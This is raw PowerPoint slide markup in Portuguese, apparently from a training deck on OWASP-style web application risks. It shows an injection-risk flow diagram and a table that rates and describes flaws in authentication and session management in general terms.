          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Injeção</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15159" y="1014413"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="38" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="48" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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49" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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50" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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52" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="41" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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42" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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43" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="35" idx="3"/>
                <a:endCxn id="40" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="46" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="40" idx="4"/>
                <a:endCxn id="45" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1107540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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137438939"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="955675"/>
          <a:ext cx="6858000" cy="2756101"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="591989">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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AD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="50405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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728"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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>GENERALIZADA</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728"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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impacto</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SEVERO</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728"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n-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728"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488699">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere atacantes externos anônimos, ou mesmo usuários autenticados,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>que podem tentar roubar contas de outros usuários. Considere também usuários internos que desejam disfarçar suas ações.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Atacante usa vazamentos ou falhas nas funções de autenticação ou gerenciamento de sessão (por exemplo, contas expostas, senhas, IDs de sessão) para assumir a identidade de outro usuário.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Os desenvolvedores frequentemente implementam a autenticação e gerenciamento de sessão  em suas aplicações de forma personalizada, mas a implementação correta é difícil. Como resultado, esses esquemas personalizados frequentemente possuem falhas em áreas do sistema como logout, gestão  de senhas, tempo de expiração, "lembrar senha",  pergunta secreta, atualizar conta, etc. Algumas vezes, encontrar essas falhas pode ser difícil já que cada implementação é única.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Tais falhas podem permitir que algumas ou mesmo </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>todas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
